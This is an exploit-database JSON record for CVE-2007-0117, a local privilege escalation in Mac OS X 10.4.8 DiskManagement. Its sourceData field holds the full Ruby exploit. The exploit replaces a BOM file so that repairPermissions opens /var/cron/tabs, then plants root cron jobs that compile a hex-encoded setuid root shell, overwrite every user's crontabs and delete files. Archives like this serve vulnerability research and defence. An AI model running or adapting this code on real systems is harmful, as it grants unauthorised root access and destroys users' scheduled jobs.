{"id": "EDB-ID:3088", "vendorId": null, "type": "exploitdb", "bulletinFamily": "exploit", "title": "Apple Mac OSX 10.4.8 - DiskManagement BOM 'cron' Local Privilege Escalation", "description": "", "published": "2007-01-05T00:00:00", "modified": "2007-01-05T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://www.exploit-db.com/exploits/3088", "reporter": "MoAB", "references": [], "cvelist": ["CVE-2007-0117"], "immutableFields": [], "lastseen": "2022-08-16T07:01:35", "viewCount": 17, "enchantments": {"score": {"value": 0.5, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.5}, "_state": {"dependencies": 1661182887, "score": 1661176728}, "_internal": {"score_hash": "81c1d4a5395c6cb60df4a27fe71a2367"}, "sourceHref": "https://www.exploit-db.com/download/3088", "sourceData": "#!/usr/bin/ruby\r\n# (c) 2006 LMH <lmh [at] info-pull.com> (code from the other exploit, porting)\r\n# Kevin Finisterre <kf_lists [at] digitalmunition.com> (crontab rock and roll)\r\n#\r\n# Second exploit for MOAB-05-01-2007, uses crontab. 
much more simple than the other one.\r\n# And works like a charm.\r\n\r\nrequire 'fileutils'\r\n\r\nEVIL_COMMANDS = [\r\n\t\t \"rm /Library/Receipts/Essentials.pkg/Contents/Archive.bom \",\r\n\t\t \"echo -e \\\"\\\\x6d\\\\x61\\\\x69\\\\x6e\\\\x28\\\\x29\\\\x7b\\\\x20\\\\x73\\\\x65\\\\x74\\\\x65\\\\x75\\\\x69\\\\x64\\\\x28\\\\x30\\\\x29\\\\x3b\\\\x20\\\\x73\\\\x65\\\\x74\\\\x65\\\\x67\\\\x69\\\\x64\\\\x28\\\\x30\\\\x29\\\\x3b\\\\x20\\\\x73\\\\x65\\\\x74\\\\x75\\\\x69\\\\x64\\\\x28\\\\x30\\\\x29\\\\x3b\\\\x20\\\\x73\\\\x65\\\\x74\\\\x67\\\\x69\\\\x64\\\\x28\\\\x30\\\\x29\\\\x3b\\\\x20\\\\x73\\\\x79\\\\x73\\\\x74\\\\x65\\\\x6d\\\\x28\\\\x22\\\\x2f\\\\x62\\\\x69\\\\x6e\\\\x2f\\\\x73\\\\x68\\\\x20\\\\x2d\\\\x69\\\\x22\\\\x29\\\\x3b\\\\x20\\\\x7d\\\\x0a\\\" > /tmp/finisterre.c\",\r\n\t\t \"/usr/bin/cc -o /Users/Shared/shX /tmp/finisterre.c; rm /tmp/finisterre.c\",\r\n \"/bin/cp -r /var/cron/tabs /Users/Shared\", # I have no legit crontabs so I don't care. \r\n \"/usr/bin/say Flavor Flave a k a `whoami` && sleep 5 && /usr/bin/say sleeping briefly && sleep 5 && chmod +s /Users/Shared/shX && sleep 5\", \r\n\t\t \"echo '' > /tmp/pwnclean\",\r\n \"for each in `ls /var/cron/tabs/`; do crontab -u $each /tmp/pwnclean; done\", # Sorry if you had any legit crontabs...\r\n\t\t \"crontab /tmp/pwnclean\", # Just to make sure\r\n\t\t \"rm -rf /tmp/pwn*\",\t\r\n ]\r\nTARGET_BOM_PATH = \"/Library/Receipts/Essentials.pkg/Contents/Archive.bom\"\r\nSHELL_TEMPLATE = \"mkdir -p /tmp/pwndertino/var/cron/tabs\\n\" +\r\n \"cd /tmp/pwndertino\\n\" +\r\n \"chmod 777 var/cron/tabs\\n\" +\r\n \"mkbom . /tmp/pwned.bom\\n\" +\r\n \"cp /tmp/pwned.bom #{TARGET_BOM_PATH}\\n\" +\r\n \"/usr/sbin/diskutil repairPermissions /\\n\"\r\n\r\nif ARGV[0] != \"repair\"\r\n # Backup if its there! Some times it is not. 
\r\n if File.exists?(TARGET_BOM_PATH)\r\n FileUtils.cp(TARGET_BOM_PATH, File.join(\"/Users/Shared\", File.basename(TARGET_BOM_PATH)))\r\n end\r\n \r\n puts \"++ Dropping the 31337 .sh skillz\"\r\n shell_script = File.new(\"moab5.sh\", \"w\")\r\n shell_script.print(SHELL_TEMPLATE)\r\n\r\n puts \"++ Fixing up crontabs\"\r\n \r\n EVIL_COMMANDS.each do |cmd|\r\n shell_script.print(\"echo '* * * * * #{cmd}' >> /var/cron/tabs/root\\n\")\r\n end\r\n\r\n \r\n shell_script.print(\"echo '* * * * * /bin/rm -rf /tmp/pwned.bom /tmp/pwndertino' >> /tmp/pwncron\\n\")\r\n shell_script.print(\"crontab /tmp/pwncron\\n\") # You may need to sleep here\r\n \r\n shell_script.close\r\n puts \"++ Execute moab5.sh\"\r\n FileUtils.chmod 0755, \"./moab5.sh\" \r\n exec \"/bin/sh\", \"-c\", \"./moab5.sh\"\r\n puts \"++ Run the repair script when you are all done.\"\r\nelse\r\n\r\n # minor repair for a post-testing scenario\r\n if File.exists?(File.join(\"/Users/Shared\", File.basename(TARGET_BOM_PATH)))\r\n FileUtils.cp(File.join(\"/Users/Shared\", File.basename(TARGET_BOM_PATH)), TARGET_BOM_PATH) # restore backup\r\n FileUtils.rm_f(File.join(\"/Users/Shared\", File.basename(TARGET_BOM_PATH)))\r\n exec \"/usr/sbin/diskutil repairPermissions /\"\r\n\r\n else\r\n exec \"/usr/sbin/diskutil repairPermissions /\"\r\n end\r\n \r\nend\r\n\r\n# milw0rm.com [2007-01-05]", "osvdbidlist": [], "exploitType": "local", "verified": true}
{}